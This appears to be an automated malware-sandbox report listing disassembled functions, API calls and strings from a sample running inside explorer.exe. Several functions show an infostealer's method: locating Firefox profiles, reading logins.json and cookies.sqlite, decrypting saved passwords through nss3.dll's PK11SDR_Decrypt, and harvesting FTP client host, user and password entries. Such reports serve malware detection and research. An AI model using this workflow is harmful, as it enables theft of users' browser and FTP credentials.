API String ID: 3498533004-0
Opcode ID: eb43647509e1e4959db50d8f341f5a13d07f2a5c4a231fd9d802d1b51a62afd6
Instruction ID: 8967703e6551b72cc132f61c34cb4fc831c410cbcc874edd5a13349f8287a700
Opcode Fuzzy Hash: eb43647509e1e4959db50d8f341f5a13d07f2a5c4a231fd9d802d1b51a62afd6
Instruction Fuzzy Hash: 96D0E2B125363062E5B526257C08EE76E5CAF02AB5B080626BA9D95090E629888782E0

Function 00089EE8 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(02730000,00000000,?), ref: 00089EF8

Strings

failed to HeapFree block %p (%lu), heap=%p, xrefs: 00089F0E

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: FreeHeap
String ID: failed to HeapFree block %p (%lu), heap=%p
API String ID: 3298025750-4030396798
Opcode ID: 12b465bb088f3113cd471a2dd04985769108c502fa93156c4168459b9eba0620
Instruction ID: 72a351b7fcbe53219eb4fa4a00916c69a200bf7d54dc485bfead5e0c0727eb3b
Opcode Fuzzy Hash: 12b465bb088f3113cd471a2dd04985769108c502fa93156c4168459b9eba0620
Instruction Fuzzy Hash: 52D0C232208240B7E2013B509C41F3B777DAB94F00F4C0029F354A9467D2789441AB22

Function 00081011 Relevance: 2.5, APIs: 2, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00081162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0008116F

GetProcessHeap.KERNEL32(00000000,00000000,?,00081A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2), ref: 00081020
HeapFree.KERNEL32(00000000), ref: 00081027

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: Heap$FreeProcessQueryVirtual
String ID:
API String ID: 2580854192-0
Opcode ID: 4eef8bc90a0115e1a74d84085bfb8a5dca21e42519d300382b8c9dff5260257b
Instruction ID: 5ce1e110c10a9ede8fa499c3b28381eecf3aac34fcf651ed23811ac42075f2bd
Opcode Fuzzy Hash: 4eef8bc90a0115e1a74d84085bfb8a5dca21e42519d300382b8c9dff5260257b
Instruction Fuzzy Hash: 3AC04C7540627056D9A037A47D0DBCA2B5DEF49362F090442B94697152CAAA8C4287B0

Function 000812A3 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

RtlZeroMemory.NTDLL(?,00000018), ref: 000812B5

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: MemoryZero
String ID:
API String ID: 816449071-0
Opcode ID: b063bd152322d9604de73742df269dbb7a13d3f582f0240a776bd5140e3242e5
Instruction ID: 14c05a8ab06494b0ae547c37f8bfa808a2e10712437e9a35d7c301f943bfb637
Opcode Fuzzy Hash: b063bd152322d9604de73742df269dbb7a13d3f582f0240a776bd5140e3242e5
Instruction Fuzzy Hash: BC11E6B5A01209AFEB10EFA5D984AEEB7FCFF08341B14402AFD45E3241D7359A01CB60

Function 0008B828 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetFileAttributesExW.KERNELBASE(00000000,00000000,?,?,00000000,-00080006), ref: 0008B848

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 253653adaefd223fbb8662ff93d56f4a9bd32f1c0072db9f85219bdcfa108373
Instruction ID: 918e8a1a8635a5898706c2da4a37bb00d924ac56ebc7212c3da473aa57b161de
Opcode Fuzzy Hash: 253653adaefd223fbb8662ff93d56f4a9bd32f1c0072db9f85219bdcfa108373
Instruction Fuzzy Hash: 10F09631A0421CDADB20AABE9C44AEEF7ECEB49764F104226E955E2091EB708D05C7D5

Function 00081677 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00081684

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: fb4c7f087d85d2d63b4df43d6836f5551ef695e3cca08a44398b5e6e88bfccad
Instruction ID: 1aa3336bd32c6042c164ad73d0f7d071ef6f1d2de0bbdc4326f5a1605f10dd89
Opcode Fuzzy Hash: fb4c7f087d85d2d63b4df43d6836f5551ef695e3cca08a44398b5e6e88bfccad
Instruction Fuzzy Hash: FBC012301212219EE7602B208C09B8627D8AF197A2F06092AA8C19A080E2A908C08AA0

Function 0008104C Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0008158A), ref: 00081056

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 95ebccbb62652008143a9f0522e465b2c08813a599faf1d21dc5491d365e052f
Instruction ID: 33199f922d5af04a34751f0835a7a6930012b223197b71027ff47a41be215880
Opcode Fuzzy Hash: 95ebccbb62652008143a9f0522e465b2c08813a599faf1d21dc5491d365e052f
Instruction Fuzzy Hash: 76A002F07D63007AFD695762AE1FF162E389740F02F100245B70D7C0D095E97500853D

Function 0008105D Relevance: 1.3, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,00084A5B,?,?,00000000,?,?,?,?,00084B66,?), ref: 00081065

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 8cc8155a45e5bdf3d6ecbf97db3d338031fe5cd3e4b13a83c9c05cbe19853f49
Instruction ID: bdaa146f7cbaa874197a4f7c39aada78053c5e51522d3c5a0494c2ac97adf33b
Opcode Fuzzy Hash: 8cc8155a45e5bdf3d6ecbf97db3d338031fe5cd3e4b13a83c9c05cbe19853f49
Instruction Fuzzy Hash: A1A0027469170066FDB457205D0AF0527146740B01F244545B641A90D18DAAF0448A28

Non-executed Functions

Function 0008349B Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 201nativefilestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000834C0

Part of subcall function 000833C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 00083401

OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,000837A8), ref: 000834E9

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 0008351E
NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 00083541
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00083586
DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 0008358F
lstrcmpiW.KERNEL32(00000000,File), ref: 000835B6
NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 000835DE
StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 000835F6
StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 00083606
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0008361E
GetFileSize.KERNEL32(?,00000000), ref: 00083631
SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00083658
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0008366B
ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00083681
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 000836AD
CloseHandle.KERNEL32(?), ref: 000836C0
CloseHandle.KERNEL32(00000000), ref: 000836F5

Part of subcall function 00081C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00081CC0
Part of subcall function 00081C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00081CDA
Part of subcall function 00081C9F: CloseHandle.KERNEL32(00000000), ref: 00081CE6

CloseHandle.KERNEL32(?), ref: 00083707

Strings

File, xrefs: 000835B0

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
String ID: File
API String ID: 3915112439-749574446
Opcode ID: 3a99b0d4a6b470b356a7520aeec362765019e2a7e87d638d3ccb8974909f4689
Instruction ID: 412b44e0d8d00dc2ce491ec342da3a435bd6f6606e26b2718310f2f2a6e93c77
Opcode Fuzzy Hash: 3a99b0d4a6b470b356a7520aeec362765019e2a7e87d638d3ccb8974909f4689
Instruction Fuzzy Hash: A661B170204301AFE720AF24CC44B6BBBE9FF88B51F140829F986D62A1D776DA558F61

Function 000D4438 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 359COMMON

Download Yara Rule

APIs

memcmp.NTDLL ref: 000D4502
memcmp.NTDLL ref: 000D475F
memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 000D4803

Strings

localhost, xrefs: 000D44FD
mode, xrefs: 000D4712
no such %s mode: %s, xrefs: 000D4784
%s mode not allowed: %s, xrefs: 000D47D0
cache, xrefs: 000D46FA
file, xrefs: 000D4474
invalid uri authority: %.*s, xrefs: 000D4513
access, xrefs: 000D4725
cach, xrefs: 000D46DC
no such vfs: %s, xrefs: 000D482F

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: memcmp$memcpy
String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
API String ID: 231171946-1096842476
Opcode ID: 469582fbedf0ab11c86b6fdba566557ccccaf4d4e3592e5a386a2dc547f3de42
Instruction ID: ce351308a1f908dedbf48f95169a9ae32f1a57fce0a675a91a38d0dcd2b7ab44
Opcode Fuzzy Hash: 469582fbedf0ab11c86b6fdba566557ccccaf4d4e3592e5a386a2dc547f3de42
Instruction Fuzzy Hash: 7BC1F170A087828BDB74CF18D49077ABBE1AF9A314F14056FF8DA87342D734D8458B66

Function 00082B15 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 102filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00081953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00082F0C), ref: 00081973
Part of subcall function 00081953: lstrlenW.KERNEL32(000D6564,?,?,00082F0C), ref: 00081978
Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,?), ref: 00081990
Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,000D6564), ref: 00081994

FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 00082B3D
lstrcmpiW.KERNEL32(?,000D62CC), ref: 00082B63
lstrcmpiW.KERNEL32(?,000D62D0), ref: 00082B7B

Part of subcall function 000819B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00082CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000819C4

StrStrIW.SHLWAPI(00000000,logins.json), ref: 00082BE7
StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 00082C16
FindNextFileW.KERNEL32(00000000,00000010), ref: 00082C43
FindClose.KERNEL32(00000000), ref: 00082C52

Strings

\*.*, xrefs: 00082B15
logins.json, xrefs: 00082BE1
cookies.sqlite, xrefs: 00082C10

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
String ID: \*.*$cookies.sqlite$logins.json
API String ID: 1108783765-3717368146
Opcode ID: 67bd7f795d4da5c9da4fb34461ee4484b492469efacdc514854bb532df0e0015
Instruction ID: e9e77636caf6dfbb37d4ac2b1a91f531cade9ce0109eeec82bb3336aa8a7f2d7
Opcode Fuzzy Hash: 67bd7f795d4da5c9da4fb34461ee4484b492469efacdc514854bb532df0e0015
Instruction Fuzzy Hash: 60318C303053015B9A14BB709899ABE77DABF84700B04492EF9C6D7283EF7AC9469762

Function 000A5F08 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 328COMMON

Download Yara Rule

APIs

Part of subcall function 00086AAA: memset.NTDLL ref: 00086AC5

memset.NTDLL ref: 000A5F53

Strings

cannot open view: %s, xrefs: 000A5FF3
indexed, xrefs: 000A60E8
cannot open virtual table: %s, xrefs: 000A5FAA
cannot open table without rowid: %s, xrefs: 000A5FCF
cannot open %s column for writing, xrefs: 000A6255
no such column: "%s", xrefs: 000A6271
foreign key, xrefs: 000A60A3

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: memset
String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
API String ID: 2221118986-594550510
Opcode ID: 5320a1aa9eaddf7819d17075fcba68c20f18865c2da46462d93fd945543395bf
Instruction ID: c7ec09d7f9e119365fbf557bf23094a0b96bd21b70c7e2f6e443a934cfb2af9d
Opcode Fuzzy Hash: 5320a1aa9eaddf7819d17075fcba68c20f18865c2da46462d93fd945543395bf
Instruction Fuzzy Hash: 5BC18E716047019FCB54DF65C480A6BB7F2BF89700F18892EF8998B242DB36DD56CB92

Function 00082112 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00082127
_alldiv.NTDLL(?,?,00989680,00000000), ref: 0008213A
wsprintfA.USER32 ref: 0008214F

Strings

%li, xrefs: 00082149

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
String ID: %li
API String ID: 4120667308-1021419598
Opcode ID: c9dfe0ce2e226fb95f3959033191fbdb1a327d87d8ca9ea0e9cd7d0578bc45ca
Instruction ID: 464f19cd6c1ac757aedf0073579f65f9fcc87417aee82f84cc687bb841d95db3
Opcode Fuzzy Hash: c9dfe0ce2e226fb95f3959033191fbdb1a327d87d8ca9ea0e9cd7d0578bc45ca
Instruction Fuzzy Hash: 5DE0923264121877D7203BA89C06EEF7B6CDB40B16F040192FE00A6286D9635A6487E5

Function 00084440 Relevance: 38.8, APIs: 12, Strings: 10, Instructions: 289stringcommemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(000D62B0,00000000,00000001,000D62A0,?), ref: 0008445F
SysAllocString.OLEAUT32(?), ref: 000844AA
lstrcmpiW.KERNEL32(RecentServers,?), ref: 0008456E
lstrcmpiW.KERNEL32(Servers,?), ref: 0008457D
lstrcmpiW.KERNEL32(Settings,?), ref: 0008458C

Part of subcall function 000811E1: lstrlenW.KERNEL32(?,7570D5B5,00000000,?,00000000,?,000846E3), ref: 000811ED
Part of subcall function 000811E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0008120F
Part of subcall function 000811E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00081231

lstrcmpiW.KERNEL32(Server,?), ref: 000845BE
lstrcmpiW.KERNEL32(LastServer,?), ref: 000845CD
lstrcmpiW.KERNEL32(Host,?), ref: 00084657
lstrcmpiW.KERNEL32(Port,?), ref: 00084679
lstrcmpiW.KERNEL32(User,?), ref: 0008469F
lstrcmpiW.KERNEL32(Pass,?), ref: 000846C5
wsprintfW.USER32 ref: 0008471E

Strings

User, xrefs: 0008469A
RecentServers, xrefs: 00084569
Port, xrefs: 00084674
Server, xrefs: 000845B9
Host, xrefs: 00084652
LastServer, xrefs: 000845C8
%s:%s, xrefs: 00084718
Servers, xrefs: 00084578
Settings, xrefs: 00084587
Pass, xrefs: 000846C0

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
API String ID: 2230072276-1234691226
Opcode ID: 3376d7830466d4f392724e7ed64b5d40cf53d611acc9bcdd8da55ad2bc886472
Instruction ID: 6fa7439c074e0e3adb43b0ca838f63fede25847a527bcff0c6dbe556fddf17e0
Opcode Fuzzy Hash: 3376d7830466d4f392724e7ed64b5d40cf53d611acc9bcdd8da55ad2bc886472
Instruction Fuzzy Hash: CDB10971208302AFD740EF64C884E6AB7E9FFC9755F00895CF5858B260DB72E806CB62

Function 000824B0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

Part of subcall function 00081090: lstrlenW.KERNEL32(?,?,00000000,000817E5), ref: 00081097
Part of subcall function 00081090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 000810A8

Part of subcall function 000819B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00082CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000819C4

GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 00082503
SetCurrentDirectoryW.KERNEL32(00000000), ref: 0008250A
LoadLibraryW.KERNEL32(00000000), ref: 00082563
SetCurrentDirectoryW.KERNEL32(?), ref: 00082570
GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00082591
GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0008259E
GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 000825AB
GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 000825B8
GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 000825C5
GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 000825D2
GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 000825DF

Part of subcall function 0008190B: lstrlen.KERNEL32(?,?,?,?,00000000,00082783), ref: 0008192B
Part of subcall function 0008190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00082783), ref: 00081930
Part of subcall function 0008190B: lstrcat.KERNEL32(00000000,?), ref: 00081946
Part of subcall function 0008190B: lstrcat.KERNEL32(00000000,00000000), ref: 0008194A

Strings

NSS_Shutdown, xrefs: 00082593
sql:, xrefs: 0008262B
NSS_Init, xrefs: 0008258B
PK11_GetInternalKeySlot, xrefs: 000825AD
PK11_Authenticate, xrefs: 000825BA
PK11SDR_Decrypt, xrefs: 000825C7
PK11_FreeSlot, xrefs: 000825D4
nss3.dll, xrefs: 00082510
SECITEM_FreeItem, xrefs: 000825A0

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
API String ID: 3366569387-3272982511
Opcode ID: 0db36531a46e31402c1dd5630552be119792c2454c9f4c8c29a6555ac291f582
Instruction ID: a7b2f55276dc6ac50742344987b6cea75d31b9ec158fb1cb6e5e99546c7f3b94
Opcode Fuzzy Hash: 0db36531a46e31402c1dd5630552be119792c2454c9f4c8c29a6555ac291f582
Instruction Fuzzy Hash: 87411731A043459BDB14BB759C945EE3BE9BF85B41700003FE8C1AB392DB798C428FA1

Function 00085E5A Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 382COMMON

Download Yara Rule

APIs

Part of subcall function 00085BF5: memset.NTDLL ref: 00085C07

_alldiv.NTDLL(?,?,05265C00,00000000), ref: 000860E1
_allrem.NTDLL(00000000,?,00000007,00000000), ref: 000860EC
_alldiv.NTDLL(?,?,000003E8,00000000), ref: 00086113
_alldiv.NTDLL(?,?,05265C00,00000000), ref: 0008618E
_alldiv.NTDLL(?,?,05265C00,00000000), ref: 000861B5
_allrem.NTDLL(00000000,?,00000007,00000000), ref: 000861C1

Strings

%06.3f, xrefs: 00086229
%04d, xrefs: 00086016
%.16g, xrefs: 00086077
%02d, xrefs: 00086039, 000861D3
%lld, xrefs: 00086122
W, xrefs: 00086193
%03d, xrefs: 000861F3

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: _alldiv$_allrem$memset
String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
API String ID: 2557048445-1989508764
Opcode ID: 13b2ebc93722260598afb2851c972d3b21a4786601c7d085fc2222c1bc1ec27f
Instruction ID: 03fa02d3f8a719d05051c4cd3801ad853ace6c955944cf10748c41d0e2873fd6
Opcode Fuzzy Hash: 13b2ebc93722260598afb2851c972d3b21a4786601c7d085fc2222c1bc1ec27f
Instruction Fuzzy Hash: CDB18EB1908B429BD735BE24CC85B3B7FD4FB40345F250699F9C2A6293EA22CD108795

Function 0009D2AC Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 169COMMON

Download Yara Rule

APIs

memcmp.NTDLL ref: 0009D324

Strings

NULL, xrefs: 0009D40F
k(%d, xrefs: 0009D2EE
%s(%d), xrefs: 0009D3AB
(blob), xrefs: 0009D416
BINARY, xrefs: 0009D31E
(%.20s), xrefs: 0009D38A
,%s%s, xrefs: 0009D34E
,%d, xrefs: 0009D444
%.16g, xrefs: 0009D3E5
%lld, xrefs: 0009D3CA
program, xrefs: 0009D46A
vtab:%p, xrefs: 0009D423

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: memcmp
String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
API String ID: 1475443563-3683840195
Opcode ID: 4a8a2c4b92b206e84d1ba56d33b102cd6b946ca4f1cce0085908098517f16554
Instruction ID: f8638983eaaee7809f1050d377c2d4bc75db0ae36d20404bd335ad5730879edd
Opcode Fuzzy Hash: 4a8a2c4b92b206e84d1ba56d33b102cd6b946ca4f1cce0085908098517f16554
Instruction Fuzzy Hash: 81513631548700ABCB20DF64DC41AABB3E5FF45700F14896BFA958B242E771ED05EBA2

Function 000828F8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 158stringfileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,00000000,?), ref: 00082AD2

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 000829E1
lstrlen.KERNEL32(00000000), ref: 000829EC
wsprintfA.USER32 ref: 00082A38
lstrlen.KERNEL32(00000000), ref: 00082A44
lstrcat.KERNEL32(00000000,00000000), ref: 00082A6C
lstrlen.KERNEL32(00000000,?,?), ref: 00082A99

Strings

TRUE, xrefs: 00082A13
FALSE, xrefs: 00082A06
%sTRUE%s%s%s%s%s, xrefs: 00082A32
COOKIES, xrefs: 00082AA4, 00082AAB, 00082AB1

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
API String ID: 304071051-2605711689
Opcode ID: 937e8feedcaa13e8e682da5f49011108d7c6ef680d76c4f8f3e7050302dc4e1f
Instruction ID: abc7e99e80b7944e8c50556b14567379447db6d12a69f2c55adc012d86cb8399
Opcode Fuzzy Hash: 937e8feedcaa13e8e682da5f49011108d7c6ef680d76c4f8f3e7050302dc4e1f
Instruction Fuzzy Hash: AC516F306083469BD725FF209851A7E7BDABF85305F04482DF9C59B253DB39DC468B62

Function 00082CB5 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 112stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00081953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00082F0C), ref: 00081973
Part of subcall function 00081953: lstrlenW.KERNEL32(000D6564,?,?,00082F0C), ref: 00081978
Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,?), ref: 00081990
Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,000D6564), ref: 00081994

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

Part of subcall function 00081B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00081B82
Part of subcall function 00081B6A: CloseHandle.KERNEL32(00000000), ref: 00081B8F

GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 00082D13
StrStrIW.SHLWAPI(00000000,Profile), ref: 00082D45
GetPrivateProfileStringW.KERNEL32(00000000,Path,000D637C,?,00000FFF,?), ref: 00082D68
GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 00082D7B
lstrlenW.KERNEL32(00000000), ref: 00082DD8

Strings

IsRelative, xrefs: 00082D75
Profile, xrefs: 00082D3F
profiles.ini, xrefs: 00082CCD
Path, xrefs: 00082D62

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
String ID: IsRelative$Path$Profile$profiles.ini
API String ID: 2234428054-4107377610
Opcode ID: 1910aacd158bad459efd24714dfcbf82a14fa5d51a064646f64bad5c31318d54
Instruction ID: d0ec9b20c8ca92714faf777618d1b70af53ee0a0b71a422be70b8ac64c31e16e
Opcode Fuzzy Hash: 1910aacd158bad459efd24714dfcbf82a14fa5d51a064646f64bad5c31318d54
Instruction Fuzzy Hash: D73160346043015BD754BF709C516AF7BE6BFC8700F14442EF986AB292DF7A8C869B52

Function 000848B1 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 000819E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A1E
Part of subcall function 000819E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A3C
